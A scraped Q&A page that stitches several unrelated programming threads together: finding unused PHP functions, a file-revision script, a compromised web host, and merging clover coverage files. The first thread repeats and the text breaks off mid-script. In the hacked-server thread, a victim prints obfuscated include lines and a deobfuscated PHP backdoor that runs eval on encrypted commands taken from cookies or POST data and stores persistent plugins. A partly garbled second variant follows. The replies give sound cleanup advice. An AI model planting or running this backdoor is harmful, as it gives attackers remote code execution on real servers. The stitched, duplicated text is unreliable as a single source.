How can I find any unused functions in a PHP project?
Are there features or APIs built into PHP that will allow me to analyse my codebase - for example Reflection, token_get_all()?
Are these APIs feature rich enough for me not to have to rely on a third party tool to perform this type of analysis?
You can try Sebastian Bergmann's Dead Code Detector:
phpdcd is a Dead Code Detector (DCD) for PHP code. It scans a PHP project for all declared functions and methods and reports those as being "dead code" that are not called at least once.
Source: https://github.com/sebastianbergmann/phpdcd
Note that it's a static code analyzer, so it might give false positives for methods that only called dynamically, e.g. it cannot detect $foo = 'fn'; $foo();
You can install it via PEAR:
pear install phpunit/phpdcd-beta
After that you can use with the following options:
Usage: phpdcd [switches] <directory|file> ...
--recursive Report code as dead if it is only called by dead code.
--exclude <dir> Exclude <dir> from code analysis.
--suffixes <suffix> A comma-separated list of file suffixes to check.
--help Prints this usage information.
--version Prints the version and exits.
--verbose Print progress bar.
More tools:
https://phpqa.io/
Note: as per the repository notice, this project is no longer maintained and its repository is only kept for archival purposes. So your mileage may vary.
Thanks Greg and Dave for the feedback. Wasn't quite what I was looking for, but I decided to put a bit of time into researching it and came up with this quick and dirty solution:
<?php
$functions = array();
$path = "/path/to/my/php/project";
define_dir($path, $functions);
reference_dir($path, $functions);
echo
"<table>" .
"<tr>" .
"<th>Name</th>" .
"<th>Defined</th>" .
"<th>Referenced</th>" .
"</tr>";
foreach ($functions as $name => $value) {
echo
"<tr>" .
"<td>" . htmlentities($name) . "</td>" .
"<td>" . (isset($value[0]) ? count($value[0]) : "-") . "</td>" .
"<td>" . (isset($value[1]) ? count($value[1]) : "-") . "</td>" .
"</tr>";
}
echo "</table>";
function define_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
define_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
define_file($path . "/" . $file, $functions);
}
}
}
}
function define_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_FUNCTION) continue;
$i++;
$token = $tokens[$i];
if ($token[0] != T_WHITESPACE) die("T_WHITESPACE");
$i++;
$token = $tokens[$i];
if ($token[0] != T_STRING) die("T_STRING");
$functions[$token[1]][0][] = array($path, $token[2]);
}
}
}
function reference_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
reference_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
reference_file($path . "/" . $file, $functions);
}
}
}
}
function reference_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_STRING) continue;
if ($tokens[$i + 1] != "(") continue;
$functions[$token[1]][1][] = array($path, $token[2]);
}
}
}
?>
I'll probably spend some more time on it so I can quickly find the files and line numbers of the function definitions and references; this information is being gathered, just not displayed.
This bit of bash scripting might help:
grep -rhio ^function\ .*\( .|awk -F'[( ]' '{print "echo -n " $2 " && grep -rin " $2 " .|grep -v function|wc -l"}'|bash|grep 0
This basically recursively greps the current directory for function definitions, passes the hits to awk, which forms a command to do the following:
print the function name
recursively grep for it again
piping that output to grep -v to filter out function definitions so as to retain calls to the function
pipes this output to wc -l which prints the line count
This command is then sent for execution to bash and the output is grepped for 0, which would indicate 0 calls to the function.
Note that this will not solve the problem calebbrown cites above, so there might be some false positives in the output.
USAGE: find_unused_functions.php <root_directory>
NOTE: This is a ‘quick-n-dirty’ approach to the problem. This script only performs a lexical pass over the files, and does not respect situations where different modules define identically named functions or methods. If you use an IDE for your PHP development, it may offer a more comprehensive solution.
Requires PHP 5
To save you a copy and paste, a direct download, and any new versions, are available here.
#!/usr/bin/php -f
<?php
// ============================================================================
//
// find_unused_functions.php
//
// Find unused functions in a set of PHP files.
// version 1.3
//
// ============================================================================
//
// Copyright (c) 2011, Andrey Butov. All Rights Reserved.
// This script is provided as is, without warranty of any kind.
//
// http://www.andreybutov.com
//
// ============================================================================
// This may take a bit of memory...
ini_set('memory_limit', '2048M');
if ( !isset($argv[1]) )
{
usage();
}
$root_dir = $argv[1];
if ( !is_dir($root_dir) || !is_readable($root_dir) )
{
echo "ERROR: '$root_dir' is not a readable directory.\n";
usage();
}
$files = php_files($root_dir);
$tokenized = array();
if ( count($files) == 0 )
{
echo "No PHP files found.\n";
exit;
}
$defined_functions = array();
foreach ( $files as $file )
{
$tokens = tokenize($file);
if ( $tokens )
{
// We retain the tokenized versions of each file,
// because we'll be using the tokens later to search
// for function 'uses', and we don't want to
// re-tokenize the same files again.
$tokenized[$file] = $tokens;
for ( $i = 0 ; $i < count($tokens) ; ++$i )
{
$current_token = $tokens[$i];
$next_token = safe_arr($tokens, $i + 2, false);
if ( is_array($current_token) && $next_token && is_array($next_token) )
{
if ( safe_arr($current_token, 0) == T_FUNCTION )
{
// Find the 'function' token, then try to grab the
// token that is the name of the function being defined.
//
// For every defined function, retain the file and line
// location where that function is defined. Since different
// modules can define a functions with the same name,
// we retain multiple definition locations for each function name.
$function_name = safe_arr($next_token, 1, false);
$line = safe_arr($next_token, 2, false);
if ( $function_name && $line )
{
$function_name = trim($function_name);
if ( $function_name != "" )
{
$defined_functions[$function_name][] = array('file' => $file, 'line' => $line);
}
}
}
}
}
}
}
// We now have a collection of defined functions and
// their definition locations. Go through the tokens again,
// and find 'uses' of the function names.
foreach ( $tokenized as $file => $tokens )
{
foreach ( $tokens as $token )
{
if ( is_array($token) && safe_arr($token, 0) == T_STRING )
{
$function_name = safe_arr($token, 1, false);
$function_line = safe_arr($token, 2, false);;
if ( $function_name && $function_line )
{
$locations_of_defined_function = safe_arr($defined_functions, $function_name, false);
if ( $locations_of_defined_function )
{
$found_function_definition = false;
foreach ( $locations_of_defined_function as $location_of_defined_function )
{
$function_defined_in_file = $location_of_defined_function['file'];
$function_defined_on_line = $location_of_defined_function['line'];
if ( $function_defined_in_file == $file &&
$function_defined_on_line == $function_line )
{
$found_function_definition = true;
break;
}
}
if ( !$found_function_definition )
{
// We found usage of the function name in a context
// that is not the definition of that function.
// Consider the function as 'used'.
unset($defined_functions[$function_name]);
}
}
}
}
}
}
print_report($defined_functions);
exit;
// ============================================================================
function php_files($path)
{
// Get a listing of all the .php files contained within the $path
// directory and its subdirectories.
$matches = array();
$folders = array(rtrim($path, DIRECTORY_SEPARATOR));
while( $folder = array_shift($folders) )
{
$matches = array_merge($matches, glob($folder.DIRECTORY_SEPARATOR."*.php", 0));
$moreFolders = glob($folder.DIRECTORY_SEPARATOR.'*', GLOB_ONLYDIR);
$folders = array_merge($folders, $moreFolders);
}
return $matches;
}
// ============================================================================
function safe_arr($arr, $i, $default = "")
{
return isset($arr[$i]) ? $arr[$i] : $default;
}
// ============================================================================
function tokenize($file)
{
$file_contents = file_get_contents($file);
if ( !$file_contents )
{
return false;
}
$tokens = token_get_all($file_contents);
return ($tokens && count($tokens) > 0) ? $tokens : false;
}
// ============================================================================
function usage()
{
global $argv;
$file = (isset($argv[0])) ? basename($argv[0]) : "find_unused_functions.php";
die("USAGE: $file <root_directory>\n\n");
}
// ============================================================================
function print_report($unused_functions)
{
if ( count($unused_functions) == 0 )
{
echo "No unused functions found.\n";
}
$count = 0;
foreach ( $unused_functions as $function => $locations )
{
foreach ( $locations as $location )
{
echo "'$function' in {$location['file']} on line {$location['line']}\n";
$count++;
}
}
echo "=======================================\n";
echo "Found $count unused function" . (($count == 1) ? '' : 's') . ".\n\n";
}
// ============================================================================
/* EOF */
2020 Update
I have used the other methods outlined above, even the 2019 update answer here is outdated.
Tomáš Votruba's answer led me to find Phan as the ECS route has now been deprecated. Symplify have removed the dead public method checker.
Phan is a static analyzer for PHP
We can utilise Phan to search for dead code. Here are the steps to take using composer to install. These steps are also found on the git repo for phan. These instructions assume you're at the root of your project.
Step 1 - Install Phan w/ composer
composer require phan/phan
Step 2 - Install php-ast
PHP-AST is a requirement for Phan
As I'm using WSL, I've been able to use PECL to install, however, other install methods for php-ast can be found in a git repo
pecl install ast
Step 3 - Locate and edit php.ini to use php-ast
Locate current php.ini
php -i | grep 'php.ini'
Now take that file location and nano (or whichever of your choice to edit this doc). Locate the area of all extensions and ADD the following line:
extension=ast.so
Step 4 - create a config file for Phan
Steps on config file can be found in Phan's documentation on how to create a config file
You'll want to use their sample one as it's a good starting point. Edit the following arrays to add your own paths on both
directory_list & exclude_analysis_directory_list.
Please note that exclude_analysis_directory_list will still be parsed but not validated eg. adding Wordpress directory here would mean, false positives for called wordpress functions in your theme would not appear as it found the function in wordpress but at the same time it'll not validate functions in wordpress' folder.
Mine looked like this
......
'directory_list' => [
'public_html'
],
......
'exclude_analysis_directory_list' => [
'vendor/',
'public_html/app/plugins',
'public_html/app/mu-plugins',
'public_html/admin'
],
......
Step 5 - Run Phan with dead code detection
Now that we've installed phan and ast, configured the folders we wish to parse, it's time to run Phan. We'll be passing an argument to phan --dead-code-detection which is self explanatory.
./vendor/bin/phan --dead-code-detection
This output will need verifying with a fine tooth comb but it's certainly the best place to start
The output will look like this in console
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
the/path/to/php/file.php:324 PhanUnreferencedPublicMethod Possibly zero references to public method\the\path\to\function::the_funciton()
Please feel free to add to this answer or correct my mistakes :)
If I remember correctly you can use phpCallGraph to do that. It'll generate a nice graph (image) for you with all the methods involved. If a method is not connected to any other, that's a good sign that the method is orphaned.
Here's an example: classGallerySystem.png
The method getKeywordSetOfCategories() is orphaned.
Just by the way, you don't have to take an image -- phpCallGraph can also generate a text file, or a PHP array, etc..
Because PHP functions/methods can be dynamically invoked, there is no programmatic way to know with certainty if a function will never be called.
The only certain way is through manual analysis.
2019+ Update
I got inspied by Andrey's answer and turned this into a coding standard sniff.
The detection is very simple yet powerful:
finds all methods public function someMethod()
then find all method calls ${anything}->someMethod()
and simply reports those public functions that were never called
It helped me to remove over 20+ methods I would have to maintain and test.
3 Steps to Find them
Install ECS:
composer require symplify/easy-coding-standard --dev
Set up ecs.yaml config:
# ecs.yaml
services:
Symplify\CodingStandard\Sniffs\DeadCode\UnusedPublicMethodSniff: ~
Run the command:
vendor/bin/ecs check src
See reported methods and remove those you don't fine useful 👍
You can read more about it here: Remove Dead Public Methods from Your Code
phpxref will identify where functions are called from which would facilitate the analysis - but there's still a certain amount of manual effort involved.
afaik there is no way. To know which functions "are belonging to whom" you would need to execute the system (runtime late binding function lookup).
But Refactoring tools are based on static code analysis. I really like dynamic typed languages, but in my view they are difficult to scale. The lack of safe refactorings in large codebases and dynamic typed languages is a major drawback for maintainability and handling software evolution.
Related
I have a script for finding files with a higher revision (based on a file naming convention).
I.E Ultimate Spreadsheet (Rev A).xls gets removed if Ultimate Spreadsheet (Rev B).xls existed. It does the same with version numbers pretty well. I'm looking to add functionality for basically the same thing to happen - but to include files with no "Rev", as some filenames have no "Rev" at all.
So for example I wanted to add functionality for:
Ultimate Powerpoint.ppt to be removed if Ultimate Powerpoint (Rev A).ppt or Ultimate Powerpoint (Rev B).ppt existed. I think I almost have the code to do this already based on it working with the first rule mentioned above, but I didn't write it myself and am pretty naff with PHP so was wondering if someone could point me in the right direction. Many thanks! My current code:
$fileList = trim(shell_exec("ls -a -1"));
$fileArray = explode("\n", $fileList);
shell_exec('mkdir -p Removed');
// Do this magic for every file
foreach ($fileArray as $thisFile)
{
if (!$thisFile) continue;
// Probably already been removed
if (!file_exists($thisFile)) continue;
$niceName = trim(preg_replace('%[\(|\[].*%', '', $thisFile));
preg_quote(pathinfo($thisGame, PATHINFO_EXTENSION), '/') . '$/', '', $thisFile);
// Check for reversions e.g. (Rev 2) or (Rev A)
if (preg_match('%\(Rev (\d|[A-Za-z])\)%', $thisFile, $revNum))
{
if (is_numeric($revNum[1]))
{
$revNum = intval($revNum[1]);
}
else
{
$revNum = ord($revNum[1]);
}
}
$otherVersions = trim(shell_exec("ls -1 \"{$niceName} (\"*\"(Rev \"* 2>/dev/null"));
if ($otherVersions)
{
$otherVersionArray = explode("\n", $otherVersions);
foreach ($otherVersionArray as $otherFile)
{
preg_match('%\(Rev (\d|[A-Za-z])\)%', $otherFile, $thisRev);
if (is_numeric($thisRev[1]))
{
$thisRev = intval($thisRev[1]);
}
else
{
$thisRev = ord($thisRev[1]);
}
if (isset($revNum) && $revNum < $thisRev)
{
// Other version is newer, bin ours
echo "{$thisFile} has an inferior version number/letter [{$revNum} VS. {$thisRev}] - Moved to Removed folder.\n";
shell_exec("mv ".escapeshellarg($thisFile)." Removed/");
continue 2;
}
}
}
}
I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak, and index.php files have been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with JS hex encoding, then echo the original index.html:
<?php
/*2d4f2*/
#include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";
/*2d4f2*/
echo file_get_contents('index.html.bak.bak');
The included file here was
/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico
On another domain, it was
/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico
As you could probably guess, these aren't actually favicons - they're just php files with a different extension. Now, I have no clue what these files do (which is why I'm asking here). They were totally obfuscated, but https://malwaredecoder.com/ seems to be able to crack through it. The results can be found here, but I've pasted the de-obfuscated code below:
#ini_set('error_log', NULL);
#ini_set('log_errors', 0);
#ini_set('max_execution_time', 0);
#error_reporting(0);
#set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
$data = NULL;
$data_key = NULL;
$GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
global $cs_auth;
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
$mode = $flag == 8 ? 'a' : 'w';
$f = #fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
function cs_get_current_filepath()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
function cs_get_plugin_config()
{
$self_content = #file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config = substr($self_content, $config_pos + 32);
$plugins = #unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
function cs_set_plugin_config($plugins)
{
$config_enc = base64_encode(cs_encrypt(#serialize($plugins), md5(cs_get_current_filepath())));
$self_content = #file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
}
#file_put_contents(cs_get_current_filepath(), $self_content);
}
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = #unserialize(cs_decrypt(base64_decode($data), $data_key));
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => #phpversion(),
'sv' => '2.0-1',
'ak' => $data['ak'],
);
echo #serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
echo $data['ak'];
}
cs_plugin_load();
}
In addition, there is a file called init5.php in one of the website's content folders, which after deobfuscating as much as possible, becomes:
$GLOBALS['893\Gt3$3'] = $_POST;
$GLOBALS['S9]<\<\$'] = $_COOKIE;
#>P>r"$,('$66N6rTNj', NULL);
#>P>r"$,('TNjr$66N6"', 0);
#>P>r"$,('k3'r$'$9#,>NPr,>k$', 0);
#"$,r,>k$rT>k>,(0);
$w6f96424 = NULL;
$s02c4f38 = NULL;
global $y10a790;
function a31f0($w6f96424, $afb8d)
{
$p98c0e = "";
for ($r035e7=0; $r035e7<",6T$P($w6f96424);)
{
for ($l545=0; $l545<",6T$P($afb8d) && $r035e7<",6T$P($w6f96424); $l545++, $r035e7++)
{
$p98c0e .= 9)6(N6`($w6f96424[$r035e7]) ^ N6`($afb8d[$l545]));
}
}
return $p98c0e;
}
function la30956($w6f96424, $afb8d)
{
global $y10a790;
return 3\x9<(3\x9<($w6f96424, $y10a790), $afb8d);
}
foreach ($GLOBALS['S9]<\<\$'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
if (!$w6f96424)
{
foreach ($GLOBALS['893\Gt3$3'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
}
$w6f96424 = ##P"$6>3T>a$(T3\<]tO(R3"$OIr`$9N`$($w6f96424), $s02c4f38));
if (isset($w6f96424['38']) && $y10a790==$w6f96424['38'])
{
if ($w6f96424['3'] == '>')
{
$r035e7 = Array(
'#=' => ##)#=$6">NP(),
'"=' => 'x%<Fx',
);
echo #"$6>3T>a$($r035e7);
}
elseif ($w6f96424['3'] == '$')
{
eval($w6f96424['`']);
}
}
There are more obfuscated PHP files the more I look, which is kinda scary. There's tons of them. Even Wordpress' index.php files seem to have been infected; the obfuscated #includes have been added to them. In addition, on one of the websites, there's a file titled 'ssh' that seems to be some kind of binary file (maybe the 'ssh' program itself?)
Does anyone know what these are or do? How did they get on my server? How can I get rid of them and make sure they never comes back?
Some other info: my webhost is Laughing Squid; I have no shell access. The server runs Linux, Apache 2.4, and PHP 5.6.29. Thank you!
You can't trust anything on the server at this point.
Reinstall the OS
Reinstall known good copies of your code with a clean or known-good version of the database.
At this point there's no use in just replacing/deleting "bad" files because the attacker could have done absolutely anything ranging from "nothing" to replacing system level software with hacked versions that will do anything desired. Just for an example, at one point someone wrote malware into a compiler so even if the executable was rebuilt, the maware was still there, also it prevented the debugger from detecting it.
There are various cleaners available, but they rely on knowing/detecting/undoing everything the attacker might have done, which is impossible.
If you had good daily backups, you could do a diff between the "what you have" and "what you had before" and see what has changed, however you would still need to carefully examine or restore your database since many attacks involve changing data, not code.
This is not a hack you need to trash your sites and server over. It is just a php hack. Get rid of all of the malicious php files and code and you'll be good. Here is how I did it on drupal. http://rankinstudio.com/Drupal_ico_index_hack
I had this same malware. There are 10 to 15 files the malware adds or modifies. I used the Quttera WordPress plug-in(free) to find the files. Most of the files can just be deleted (Be careful, Quttera ids more than are actually infected) but some WordPress files were modified and must be replaced.
Had to write myself one PHP script to scan the whole server tree, listing all directory paths, and one to scan those paths for infections. Can only partly clean, but provides much needed help with the pedestrian cleanup.
NOTE:
It's poorly written, and probably should be removed after use. But it helped me.
A zipped copy is here.
No guarantees; unzip it and take a look what you put on your server, before uploading it!
Update: Now cleans more (not all!). Follow up with hand-cleaning (see below).
I had the same problem.
It is caused by malicious http post requests.
Here is a good article about how to stop it:
The following in a .htaccess file will stop all post requests.
https://perishablepress.com/protect-post-requests/
# deny all POST requests
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} POST
RewriteRule .* - [F,L]
</IfModule>
I haven't found yet, how to prevent these files from appearing on my server, yet i'm able to get rid of them, here's a oneliner crawling down the folders and removing them:
find . -type f -name 'favicon_*.ico' -delete -print
I have several clover.xml reports of different extensions of a projects. I want to combine them into one clover.xml and then create it into a clover html. But i see no way with the phpunit classes PHP_CodeCoverage, PHP_CodeCoverage_Report_HTML, PHP_CodeCoverage_Report_Clover.
None of these classes accept an existing clover.xml. I thought I might be able to work with the methods append and merge of PHP_CodeCoverage. But that does not accept files.
If you are running jenkins or similar include a php script in your Ant build file to merge the files using SimpleXML
An example is here
http://kuttler.eu/post/merging-and-splitting-xml-files-with-simplexml/
Then in your post build actions jenkins will use the clover.xml to generate your code coverage
As jkrnak commented above you cannot simply merge the XML files as there are computed values such as lines covered etc.. that are computed at output time. You need to "merge" while still working with native PHP code. In my case I wanted to capture the coverage of a series of web service calls executed by newman. To do this I set a flag at the beginning of execution which persists across invocations (using a cache) and then also save the PHP_CodeCoverage object in the cache as well. My implementation (in Laravel) looks something like this:
if ( isset($_GET['initCoverage']) )
{
Cache::put( 'recordCoverage', true, 1440 );
}
if ( Cache::has('recordCoverage') )
{
if ( Cache::has('coverage') )
{
$coverage = Cache::get('coverage');
}
else
{
$filter = new PHP_CodeCoverage_Filter;
$filter->addDirectoryToBlacklist( base_path() . '/vendor' );
$coverage = new PHP_CodeCoverage( null, $filter );
}
$coverage->start( Request::method() . " " . Request::path() );
if ( isset($_GET['dumpCoverage']) )
{
if ( Cache::has('coverage') )
{
// Prevent timeout as writing coverage reports takes a long time
set_time_limit( 0 );
$coverage = Cache::get( 'coverage' );
$writer = new PHP_CodeCoverage_Report_Clover;
$writer->process($coverage, 'results/coverage/clover.xml');
}
Cache::forget('recordCoverage');
Cache::forget('coverage');
}
else
{
register_shutdown_function( function($coverage)
{
$coverage->stop();
Cache::put( 'coverage', $coverage, 1440);
}, $coverage);
}
}
This captures the series of tests in a single coverage object which is then output when I make a call with the "dumpCoverage" flag.
Years later this issue is still partly unsolved. There is a project by SB that can merge clover files, but it requires php 5.6.
None of the answers above work sufficiently well. Here is a gist of a merge thrown together. Constructive critisism welcome.
Usage:
php clover-merge.php -o merged.xml -f clover-phpunit.xml -f clover-phpspec.xml
Posting it here for posterity too:
<?php
$options = getopt("f:o:");
if (! isset($options['f'])) {
echo "Files have to be specified with -f\n";
exit(1);
}
if (! isset($options['o'])) {
echo "Output has to be specified with -o\n";
exit(1);
}
$files = $options['f'];
if (! is_array($files)) {
$files = array($files);
}
$output = $options['o'];
$buffer = '';
foreach ($files as $file) {
if (! file_exists($file)) {
echo "File '$file' doesn't exist\n";
exit(2);
}
$report = simplexml_load_file($file);
$buffer .= $report->project->asXML();
}
$fh = fopen($output ,'w');
if (! $fh) {
echo "Cannot open '$output' for writing\n";
exit(2);
}
fwrite($fh, sprintf('<?xml version="1.0" encoding="UTF-8"?><coverage>%s</coverage>', $buffer));
fclose($fh);
How can I find any unused functions in a PHP project?
Are there features or APIs built into PHP that will allow me to analyse my codebase - for example Reflection, token_get_all()?
Are these APIs feature rich enough for me not to have to rely on a third party tool to perform this type of analysis?
You can try Sebastian Bergmann's Dead Code Detector:
phpdcd is a Dead Code Detector (DCD) for PHP code. It scans a PHP project for all declared functions and methods and reports those as being "dead code" that are not called at least once.
Source: https://github.com/sebastianbergmann/phpdcd
Note that it's a static code analyzer, so it might give false positives for methods that only called dynamically, e.g. it cannot detect $foo = 'fn'; $foo();
You can install it via PEAR:
pear install phpunit/phpdcd-beta
After that you can use with the following options:
Usage: phpdcd [switches] <directory|file> ...
--recursive Report code as dead if it is only called by dead code.
--exclude <dir> Exclude <dir> from code analysis.
--suffixes <suffix> A comma-separated list of file suffixes to check.
--help Prints this usage information.
--version Prints the version and exits.
--verbose Print progress bar.
More tools:
https://phpqa.io/
Note: as per the repository notice, this project is no longer maintained and its repository is only kept for archival purposes. So your mileage may vary.
Thanks Greg and Dave for the feedback. Wasn't quite what I was looking for, but I decided to put a bit of time into researching it and came up with this quick and dirty solution:
<?php
$functions = array();
$path = "/path/to/my/php/project";
define_dir($path, $functions);
reference_dir($path, $functions);
echo
"<table>" .
"<tr>" .
"<th>Name</th>" .
"<th>Defined</th>" .
"<th>Referenced</th>" .
"</tr>";
foreach ($functions as $name => $value) {
echo
"<tr>" .
"<td>" . htmlentities($name) . "</td>" .
"<td>" . (isset($value[0]) ? count($value[0]) : "-") . "</td>" .
"<td>" . (isset($value[1]) ? count($value[1]) : "-") . "</td>" .
"</tr>";
}
echo "</table>";
function define_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
define_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
define_file($path . "/" . $file, $functions);
}
}
}
}
function define_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_FUNCTION) continue;
$i++;
$token = $tokens[$i];
if ($token[0] != T_WHITESPACE) die("T_WHITESPACE");
$i++;
$token = $tokens[$i];
if ($token[0] != T_STRING) die("T_STRING");
$functions[$token[1]][0][] = array($path, $token[2]);
}
}
}
function reference_dir($path, &$functions) {
if ($dir = opendir($path)) {
while (($file = readdir($dir)) !== false) {
if (substr($file, 0, 1) == ".") continue;
if (is_dir($path . "/" . $file)) {
reference_dir($path . "/" . $file, $functions);
} else {
if (substr($file, - 4, 4) != ".php") continue;
reference_file($path . "/" . $file, $functions);
}
}
}
}
function reference_file($path, &$functions) {
$tokens = token_get_all(file_get_contents($path));
for ($i = 0; $i < count($tokens); $i++) {
$token = $tokens[$i];
if (is_array($token)) {
if ($token[0] != T_STRING) continue;
if ($tokens[$i + 1] != "(") continue;
$functions[$token[1]][1][] = array($path, $token[2]);
}
}
}
?>
I'll probably spend some more time on it so I can quickly find the files and line numbers of the function definitions and references; this information is being gathered, just not displayed.
This bit of bash scripting might help:
grep -rhio ^function\ .*\( .|awk -F'[( ]' '{print "echo -n " $2 " && grep -rin " $2 " .|grep -v function|wc -l"}'|bash|grep 0
This basically recursively greps the current directory for function definitions, passes the hits to awk, which forms a command to do the following:
print the function name
recursively grep for it again
piping that output to grep -v to filter out function definitions so as to retain calls to the function
pipes this output to wc -l which prints the line count
This command is then sent for execution to bash and the output is grepped for 0, which would indicate 0 calls to the function.
Note that this will not solve the problem calebbrown cites above, so there might be some false positives in the output.
USAGE: find_unused_functions.php <root_directory>
NOTE: This is a ‘quick-n-dirty’ approach to the problem. This script only performs a lexical pass over the files, and does not respect situations where different modules define identically named functions or methods. If you use an IDE for your PHP development, it may offer a more comprehensive solution.
Requires PHP 5
To save you a copy and paste, a direct download, and any new versions, are available here.
#!/usr/bin/php -f
<?php
// ============================================================================
//
// find_unused_functions.php
//
// Find unused functions in a set of PHP files.
// version 1.3
//
// ============================================================================
//
// Copyright (c) 2011, Andrey Butov. All Rights Reserved.
// This script is provided as is, without warranty of any kind.
//
// http://www.andreybutov.com
//
// ============================================================================
// This may take a bit of memory...
ini_set('memory_limit', '2048M');
if ( !isset($argv[1]) )
{
usage();
}
$root_dir = $argv[1];
if ( !is_dir($root_dir) || !is_readable($root_dir) )
{
echo "ERROR: '$root_dir' is not a readable directory.\n";
usage();
}
$files = php_files($root_dir);
$tokenized = array();
if ( count($files) == 0 )
{
echo "No PHP files found.\n";
exit;
}
$defined_functions = array();
foreach ( $files as $file )
{
$tokens = tokenize($file);
if ( $tokens )
{
// We retain the tokenized versions of each file,
// because we'll be using the tokens later to search
// for function 'uses', and we don't want to
// re-tokenize the same files again.
$tokenized[$file] = $tokens;
for ( $i = 0 ; $i < count($tokens) ; ++$i )
{
$current_token = $tokens[$i];
$next_token = safe_arr($tokens, $i + 2, false);
if ( is_array($current_token) && $next_token && is_array($next_token) )
{
if ( safe_arr($current_token, 0) == T_FUNCTION )
{
// Find the 'function' token, then try to grab the
// token that is the name of the function being defined.
//
